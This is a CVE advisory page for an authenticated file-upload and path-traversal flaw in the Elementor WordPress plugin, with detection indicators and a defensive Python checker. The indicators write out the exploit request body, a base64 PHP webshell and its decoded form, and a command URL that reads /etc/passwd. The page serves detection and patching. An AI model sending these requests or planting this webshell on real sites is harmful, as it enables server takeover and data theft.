CVE-2023-48777
published 2024-03-26


Priority: P179 high · 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 4.10% (89.5th percentile)

Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder. This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.

Affected

2 ranges

| Vendor | Product | Version range | Fixed in |
| --- | --- | --- | --- |
| elementor.com | elementor_website_builder | 3.3.0 – 3.18.1 | |
| elementor | website_builder | >= 3.3.0 < 3.18.2 | 3.18.2 |

Detection & IOCs (extracted from sources)

url: /wp-admin/admin-ajax.php
path: /wp-content/plugins/elementor/
command: actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
command: {"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}
path: /../../../../<random>.php
url: /wp-content/<random>.php?cmd=cat+/etc/passwd
url: /wp-admin/post.php?post=1&action=elementor
bytes: PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=

  • Exploit targets the `elementor_ajax` action via admin-ajax.php with an `import_template` sub-action to upload a PHP webshell via path traversal in the `fileName` parameter.
  • The uploaded PHP webshell payload (base64: PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=) decodes to `<?php echo system($_GET['cmd']); ?>` — monitor for this string in uploaded files or POST bodies.
  • Path traversal sequence `/../../../../` in the `fileName` field of the import_template action is used to place the PHP file outside the intended upload directory — alert on this pattern in POST bodies to admin-ajax.php.
  • After upload, the webshell is accessed under /wp-content/<filename>.php with a `cmd` GET parameter — monitor for unexpected PHP file access under /wp-content/ with shell command parameters.
  • Successful exploitation confirmed by `root:.*:0:0:` pattern in HTTP response body — use this as a post-exploitation indicator in web server logs or WAF response inspection.
  • Vulnerability affects Elementor Website Builder versions 3.3.0 through 3.18.1; presence of the plugin at /wp-content/plugins/elementor/ on unpatched sites is a risk indicator.
  • Exploitation requires authentication at contributor-level or above; unauthenticated exploitation is not possible.
  • Fixed in Elementor version 3.18.2; systems running 3.18.2 or later are not affected.
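
One way to apply the POST-body checks listed above to captured requests, as an added example that is not code from the sources or from Elementor. The function names, the `site.example` host, the nonce value and both sample bodies are constructed for illustration, and the suspicious sample carries a harmless PHP `echo` rather than a shell.

```python
import base64
import json
from urllib.parse import parse_qs, urlencode, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"

def inspect_request(method, url, body):
    """Return findings for one logged HTTP request; an empty list means clean."""
    if method.upper() != "POST" or urlsplit(url).path != AJAX_PATH:
        return []
    form = parse_qs(body)  # parse_qs also URL-decodes each value
    if form.get("action", [""])[0] != "elementor_ajax":
        return []
    try:
        actions = json.loads(form.get("actions", ["{}"])[0])
    except json.JSONDecodeError:
        return ["unparseable actions JSON"]
    findings = []
    for entry in (actions.values() if isinstance(actions, dict) else []):
        if not isinstance(entry, dict) or entry.get("action") != "import_template":
            continue
        data = entry.get("data") if isinstance(entry.get("data"), dict) else {}
        name = str(data.get("fileName", ""))
        if ".." in name.replace("\\", "/").split("/"):
            findings.append("path traversal in fileName")
        if name.lower().endswith(".php"):
            findings.append("PHP extension in fileName")
        try:
            decoded = base64.b64decode(str(data.get("fileData", "")), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = b""
        if b"<?php" in decoded.lower():
            findings.append("PHP code in fileData")
    return findings

def build_body(file_name, content):
    """Build a constructed form body in the shape shown on this page."""
    actions = {"import_template": {"action": "import_template", "data": {
        "fileName": file_name, "fileData": base64.b64encode(content).decode()}}}
    return urlencode({"actions": json.dumps(actions), "_nonce": "0000000000",
                      "editor_post_id": "1", "initial_document_id": "1",
                      "action": "elementor_ajax"})

# Constructed samples: one flagged request with a harmless body, one ordinary import.
URL = "https://site.example/wp-admin/admin-ajax.php"
SUSPICIOUS = build_body("/../../../../example.php", b"<?php echo 'constructed'; ?>")
BENIGN = build_body("landing-page.json", b'{"title": "Landing", "content": []}')

if __name__ == "__main__":
    print(inspect_request("POST", URL, SUSPICIOUS))
    print(inspect_request("POST", URL, BENIGN))
```

Decoding `fileData` before matching matters because the PHP marker never appears in cleartext in the POST body; a plain string match on `<?php` against raw request logs would miss it.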

CVSS provenance

nvd · v3.1 · 8.8 · HIGH · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.9 · CRITICAL